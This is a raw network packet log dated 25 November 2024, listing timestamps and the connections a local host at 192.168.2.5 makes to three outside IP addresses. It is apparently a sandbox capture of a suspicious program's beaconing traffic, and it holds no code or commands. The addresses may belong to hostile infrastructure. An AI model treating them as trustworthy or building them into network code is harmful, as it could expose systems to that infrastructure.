                                                                                                                              Nov 25, 2024 07:08:43.451160908 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.452822924 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.452879906 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.452925920 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.452997923 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.454633951 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.454700947 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.454740047 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.454802990 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.456420898 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.456490040 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.456582069 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.456633091 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.458240032 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.458329916 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.458332062 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.458390951 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.460078955 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.460165024 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.460170984 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.460225105 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.461879969 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.461951971 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.461991072 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.462063074 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.463706017 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.463774920 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.463807106 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.463879108 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.465528011 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.465596914 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.465643883 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.465708971 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.467462063 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.467511892 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.467673063 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.467730999 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.469217062 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.469269991 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.469357014 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.469409943 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.470999002 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.471056938 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.471091986 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.471142054 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.473058939 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.473124027 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.473201036 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.473252058 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.474663019 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.474730015 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.474767923 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.474839926 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.476454020 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.476514101 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.476555109 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.476619005 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.478286982 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.478346109 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.478390932 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.478441954 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.480101109 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.480159998 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.480169058 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.480212927 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.481887102 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.481952906 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.482074022 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.482122898 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.483741045 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.483803034 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.483876944 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.483930111 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.485584021 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.485649109 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.485677004 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.485728979 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.487369061 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.487436056 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.487473011 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.487519026 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.489214897 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.489283085 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.489343882 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.489453077 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.491137028 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.491200924 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.491236925 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.491295099 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.492845058 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.492909908 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.493062019 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.493124008 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.494685888 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.494756937 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.494781017 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.494836092 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.496480942 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.496543884 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.496712923 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.496768951 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.498239994 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.498292923 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.498445034 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.498495102 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.500196934 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.500255108 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.500324011 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.500375032 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.501929045 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.502037048 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.502063990 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.502140045 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.503712893 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.503801107 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.503855944 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.503935099 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.505533934 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.505598068 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.505712032 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.505764961 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.507360935 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.507417917 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.507456064 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.507522106 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:43.509114027 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:43.509176970 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:44.496153116 CET4975780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:44.616455078 CET8049757193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:44.616797924 CET4975780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:44.617152929 CET4975780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:44.736517906 CET8049757193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:48.664309978 CET8049757193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:48.668427944 CET4975780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:48.787942886 CET8049757193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:49.011686087 CET8049757193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:49.051470041 CET4975780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:49.512783051 CET49771443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:49.512824059 CET44349771172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:49.512904882 CET49771443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:49.525090933 CET49771443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:49.525110960 CET44349771172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:50.833847046 CET44349771172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:50.833928108 CET49771443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:50.840512037 CET49771443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:50.840545893 CET44349771172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:50.840862989 CET44349771172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:50.889857054 CET49771443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:50.931339025 CET44349771172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:51.290860891 CET44349771172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:51.290923119 CET44349771172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:51.290967941 CET49771443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:51.297472000 CET49771443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:51.303636074 CET4975780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:51.423131943 CET8049757193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:51.666965961 CET8049757193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:51.669145107 CET49777443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:51.669173956 CET44349777172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:51.669235945 CET49777443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:51.669495106 CET49777443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:51.669512033 CET44349777172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:51.707734108 CET4975780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:52.926265955 CET44349777172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:52.928733110 CET49777443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:52.928800106 CET44349777172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:53.389440060 CET44349777172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:53.389524937 CET44349777172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:53.389584064 CET49777443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:53.390019894 CET49777443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:53.393361092 CET4975780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:53.394454002 CET4977980192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:53.513222933 CET8049757193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:53.513294935 CET4975780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:53.513942957 CET8049779193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:53.514012098 CET4977980192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:53.514131069 CET4977980192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:53.532586098 CET8049751185.244.144.68192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:53.532670021 CET4975180192.168.2.5185.244.144.68
                                                                                                                              Nov 25, 2024 07:08:53.633529902 CET8049779193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:57.096506119 CET8049779193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:57.097814083 CET49790443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:57.097848892 CET44349790172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:57.097922087 CET49790443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:57.098181963 CET49790443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:57.098196983 CET44349790172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:57.145241022 CET4977980192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:58.401362896 CET44349790172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:58.404525042 CET49790443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:58.404547930 CET44349790172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:58.863354921 CET44349790172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:58.863425970 CET44349790172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:58.863512039 CET49790443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:58.863926888 CET49790443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:08:58.883029938 CET4979680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:59.002578974 CET8049796193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:59.002758026 CET4979680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:59.003117085 CET4979680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:08:59.122575998 CET8049796193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:00.533708096 CET8049796193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:00.535398960 CET49801443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:00.535444975 CET44349801172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:00.535515070 CET49801443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:00.535758972 CET49801443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:00.535773039 CET44349801172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:00.582757950 CET4979680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:01.034914970 CET8049796193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:01.034982920 CET4979680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:02.170547009 CET44349801172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:02.171996117 CET49801443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:02.172019005 CET44349801172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:02.625159979 CET44349801172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:02.625226974 CET44349801172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:02.625329971 CET49801443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:02.625725031 CET49801443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:02.629108906 CET4979680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:02.630039930 CET4980580192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:02.748961926 CET8049796193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:02.749521017 CET8049805193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:02.749602079 CET4979680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:02.749629974 CET4980580192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:02.749855042 CET4980580192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:02.869960070 CET8049805193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:04.541706085 CET8049805193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:04.543123960 CET49811443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:04.543174028 CET44349811172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:04.543243885 CET49811443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:04.543679953 CET49811443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:04.543695927 CET44349811172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:04.582755089 CET4980580192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:05.847841024 CET44349811172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:05.849845886 CET49811443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:05.849883080 CET44349811172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:06.314585924 CET44349811172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:06.314660072 CET44349811172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:06.314723015 CET49811443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:06.315248013 CET49811443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:06.319096088 CET4980580192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:06.320168972 CET4981680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:06.438947916 CET8049805193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:06.439062119 CET4980580192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:06.439599991 CET8049816193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:06.439678907 CET4981680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:06.439815998 CET4981680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:06.559273005 CET8049816193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:10.335251093 CET8049816193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:10.336802006 CET49827443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:10.336862087 CET44349827172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:10.336940050 CET49827443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:10.337219954 CET49827443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:10.337240934 CET44349827172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:10.379710913 CET4981680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:11.548507929 CET44349827172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:11.550617933 CET49827443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:11.550662994 CET44349827172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:11.995457888 CET44349827172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:11.995537996 CET44349827172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:11.995590925 CET49827443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:12.008347034 CET49827443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:12.098777056 CET4981680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:12.107125044 CET4983080192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:12.218674898 CET8049816193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:12.218760014 CET4981680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:12.226608992 CET8049830193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:12.226684093 CET4983080192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:12.230806112 CET4983080192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:12.350347042 CET8049830193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:16.540504932 CET8049830193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:16.541815042 CET49840443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:16.541877985 CET44349840172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:16.541944027 CET49840443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:16.542177916 CET49840443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:16.542195082 CET44349840172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:16.582726002 CET4983080192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:17.799243927 CET44349840172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:17.800733089 CET49840443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:17.800786018 CET44349840172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:18.370050907 CET44349840172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:18.370142937 CET44349840172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:18.370223999 CET49840443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:18.370585918 CET49840443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:18.373733044 CET4983080192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:18.374833107 CET4984680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:18.493511915 CET8049830193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:18.493618965 CET4983080192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:18.494298935 CET8049846193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:18.494379044 CET4984680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:18.494518042 CET4984680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:18.613933086 CET8049846193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:19.742892981 CET8049846193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:19.744410992 CET49851443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:19.744448900 CET44349851172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:19.744519949 CET49851443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:19.744769096 CET49851443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:19.744790077 CET44349851172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:19.785995007 CET4984680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:21.001828909 CET44349851172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:21.003448009 CET49851443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:21.003470898 CET44349851172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:21.456033945 CET44349851172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:21.456087112 CET44349851172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:21.456130981 CET49851443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:21.456535101 CET49851443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:21.459453106 CET4984680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:21.460468054 CET4985780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:21.579404116 CET8049846193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:21.579483032 CET4984680192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:21.579973936 CET8049857193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:21.580037117 CET4985780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:21.580137014 CET4985780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:21.699582100 CET8049857193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:23.377048969 CET8049857193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:23.378365993 CET49859443192.168.2.5172.67.177.134
